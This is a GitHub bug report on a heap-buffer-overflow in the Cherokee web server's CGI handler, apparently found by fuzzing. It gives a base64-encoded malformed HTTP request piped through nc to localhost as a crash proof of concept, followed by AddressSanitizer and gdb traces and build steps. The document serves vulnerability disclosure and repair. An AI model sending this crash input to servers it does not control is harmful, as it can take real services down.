heap-buffer-overflow in handler cgi
mmmds opened this issue · 1 comments
mmmds commented
PoC
echo -n 'R0VUIC90ZXN0MTAvdGVzdC5odG1sIEhUVFAvMS4xCkFjY2VwdDogMTI3LjAuMC4xCkFjY2VwdC1DaGFyc2V0OiAxMjcuMC4wLjEKQWNjZXB0LUVuY29kaW5nOiAxMjcuMC4wLjEKQWNjZXB0LUxhbmd1YWdlOiAxMjcuMC4wLjEKQXV0aG9yaXphdGlvbjogMTI3LjAuMC4xCkNhY2hlLUNvbnRyb2w6IDEyNy4wLjAuMQpDaGFyZ2UtVG86IDEyNy4wLjAuMQpDb25uZWN0aW9uOiAxMjcuMC4wLjEKQ29udGVudC1UeXBlOiAxMjcuMC4wLjEKQ29va2llOiAxMjcuMC4wLjEKRE5UOiAxMjcuMC4wLjEKRXhwZWN0OiAxMjcuMC4wLjEKRm9yd2FyZGVkOiAxMjcuMC4wLjEKRnJvbTogMTI3LjAuMC4xCkZyb250LUVuZC1IdHRwZDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpJZi1NYXRjaDogMTI3LjAuMC4xCklmLU1vZGlmaWVkLVNpbmNlOiAxMjcuMC4wLjEKSWYtTm9uZS1NYXRjaDogMTI3LjAuMC4xCklmLVJhbmdlOiAxMjcuMC4wLjEKSWYtVW5tb2RpZmllZC1TaW5jZTogMTI3LjAuMC4xCktlZXAtQWxpdmU6IDEyNy4wLjAuMQpNYXgtRm9yd2FyZHM6IDEyNy4wLjAuMQpOZWdvdGlhdGU6IDEyNy4wLjAuMQpQcmFnbWE6IDEyNy4wLjAuMQpQcm94eS1BdXRob3JpemF0aW9uOiAxMjcuMC4wLjEKUHJveHktQ29ubmVjdGlvbjogMTI3LjAuMC4xCk9yaWdpbjogMTI3LjAuMC4xClJhbmdlOiAxMjcuMC4wLjEKVEU6IDEyNy4wLjAuMQpUcmFuc2Zlci1FbmNvZGluZzogMTI3LjAuMC4xClRyYW5zZmVyLUVuY29kaW5nOiAxMjcuMC4wLjEKVXBncmFkZTogMTI3LjAuMC4xClVwZ3JhZGU6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiAxMjcuMC4wLjEKVXNlci1BZ2VudDogMTI3LjAuMC4xClVzZXItQWdlbnQ6IDEyNy4wLjAuMQpWaWE6IDEyNy4wLjAuMQpQcm94eS1BdXRob3JpemF0aW9uOiAxMjcuMC4wLjEKUHJveHktQ29ubmVjdGlvbjogMTI3LjAuMC4xCk9yaWdpbjogMTI3LjAuMC4xClJhbmdlOiAxMjcuMC4wLjEKUmVmZXJlcjogMTI3LjAuMC4xClJlZmVyZXI6IDEyNy4wLjAuMQpSZXF1ZXN0LVJhbmdlOiAxMjcuMC4wLjEKVEU6IDEyNy4wLjAuMQpUcmFuc2Zlci1FbmNvZGluZzogMTI3LjAuMC4xClRyYW5zZmVyLUVuY29kaW5nOiAxMjcuMC4wLjEKVXBncmFkZTogMTI3LjAuMC4xClVwZ3JhZGU6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiAxMjcuMC4wLjEKVXNlci1BZ2VudDogMTI3LjAuMC4xClVzZXItQWdlbnQ6IDEyNy4wLjAuMQpWaWE6IDEyNy4wLjAuMQpYLUFUVC1EZXZpY2VJZDogMTI3LjAuMC4xClgtRm9yd2FyZGVkLUZvcjogMTI3LjAuMC4xClgtRm9yd2FyZGVkLUhvc3Q6IDEyNy4wLjAuMQpYLUZvcndhcmRlZC1Qcm90bzogMTI3LjAuMC4xClgtRm9yd2FyZGVkLVNlcnZlcjogMTI3LjAuMC4xClgtUmVxdWVzdGVkLVdpdGg6IDEyNy4wLjAuMQpYLWxvcmktdGltZS0xOiAxMjcuMC4wLjEKWC1Eby1Ob3QtVHJhY2s6IDEyNy4wLjAuMQpYLUNvbnRlbnQtU2VjdXJpdHktUG9saWN5OiAxMjcuMC4wLjEKWC1Db250ZW50LVR5cGUtT3B0aW9uczogMTI3LjAuMC4xClgtRnJhbWUtT3B0aW9uczogMTI3LjAuMC4xClgtWFNTLVByb3RlY3Rpb246IDEyNy4wLjAuMQpYLVdhcC1Qcm9maWxlOiAxMjcuMC4wLjEKCgo=' | base64 -d | nc 127.0.0.1 80
ASAN
==26982==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6180000117c0 at pc 0x559e00d26059 bp 0x7f01f18e9250 sp 0x7f01f18e9240
READ of size 8 at 0x6180000117c0 thread T4
#0 0x559e00d26058 in cherokee_services_client_spawn /home/mmm/fuzz/webserver/cherokee/services-client.c:201
#1 0x559e00d5dd3c in fork_and_execute_cgi_via_spawner /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:802
#2 0x559e00d5a5a8 in cherokee_handler_cgi_init /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:382
#3 0x559e00dd244c in cherokee_handler_init /home/mmm/fuzz/webserver/cherokee/handler.c:93
#4 0x559e00dcf233 in cherokee_connection_open_request /home/mmm/fuzz/webserver/cherokee/connection.c:2678
#5 0x559e00d0b889 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1165
#6 0x559e00d11549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
#7 0x559e00d05300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
#8 0x7f01f69f46da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
#9 0x7f01f651988e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)
0x6180000117c0 is located 0 bytes to the right of 832-byte region [0x618000011480,0x6180000117c0)
allocated by thread T4 here:
#0 0x7f01f6f22b50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
#1 0x559e00d5908e in cherokee_handler_cgi_new /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:124
#2 0x559e00dcd8b0 in cherokee_connection_create_handler /home/mmm/fuzz/webserver/cherokee/connection.c:2446
#3 0x559e00d0b1f1 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1104
#4 0x559e00d11549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
#5 0x559e00d05300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
#6 0x7f01f69f46da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
Thread T4 created by T0 here:
#0 0x7f01f6e7bd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
#1 0x559e00d06219 in cherokee_thread_new /home/mmm/fuzz/webserver/cherokee/thread.c:247
#2 0x559e00cee73f in initialize_server_threads /home/mmm/fuzz/webserver/cherokee/server.c:671
#3 0x559e00cf0a05 in cherokee_server_initialize /home/mmm/fuzz/webserver/cherokee/server.c:1053
#4 0x559e00c9476f in common_server_initialization /home/mmm/fuzz/webserver/cherokee/main_worker.c:255
#5 0x559e00c951f7 in main /home/mmm/fuzz/webserver/cherokee/main_worker.c:393
#6 0x7f01f6419b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/mmm/fuzz/webserver/cherokee/services-client.c:201 in cherokee_services_client_spawn
Shadow bytes around the buggy address:
0x0c307fffa2a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffa2b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffa2c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffa2d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c307fffa2e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c307fffa2f0: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
0x0c307fffa300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c307fffa310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c307fffa320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c307fffa330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c307fffa340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==26982==ABORTING
Setup:
- Ubuntu 18.04 64 bit
- source code from github, commit 9a75e65
- build command:
ac_cv_func_realloc_0_nonnull=yes ac_cv_func_malloc_0_nonnull=yes LDFLAGS="-lasan" LDADD="-lasan" CFLAGS="-fsanitize=address -ggdb -O0 -fprofile-arcs -ftest-coverage" ./configure --prefix=`pwd`/bin --enable-trace --enable-static-module=all --enable-static --enable-shared=no
make
- files in webroot
mkdir /var/www/test{1..20}; for i inseq 1 20; do echo test > test$i/test.html; done - configuration file cherokee.txt
found by: Mateusz Kocielski, Michał Dardas from LogicalTrust
skinkie commented
In my own test I end up with, which obviously is also something that should be fixed.
Thread 1 "cherokee-worker" received signal SIGSEGV, Segmentation fault.
0x00007ffff71d0452 in ?? () from /usr/lib/gcc/x86_64-pc-linux-gnu/9.2.0/libasan.so.5
(gdb) bt
#0 0x00007ffff71d0452 in ?? () from /usr/lib/gcc/x86_64-pc-linux-gnu/9.2.0/libasan.so.5
#1 0x00007ffff72b3f45 in free () from /usr/lib/gcc/x86_64-pc-linux-gnu/9.2.0/libasan.so.5
#2 0x0000555555711624 in cherokee_handler_cgi_free (cgi=0x618000005480) at handler_cgi.c:240
#3 0x000055555579a8e9 in cherokee_handler_free (hdl=0x618000005480) at handler.c:72
#4 0x0000555555788d03 in cherokee_connection_setup_error_handler (conn=0x61d000006e80) at connection.c:442
#5 0x00005555556c6505 in process_active_connections (thd=0x61300000d080) at thread.c:1276
#6 0x00005555556ca112 in cherokee_thread_step_SINGLE_THREAD (thd=0x61300000d080) at thread.c:1891
#7 0x00005555556abbf6 in cherokee_server_step (srv=0x617000000080) at server.c:1161
#8 0x0000555555651591 in main (argc=1, argv=0x7fffffffd978) at main_worker.c:407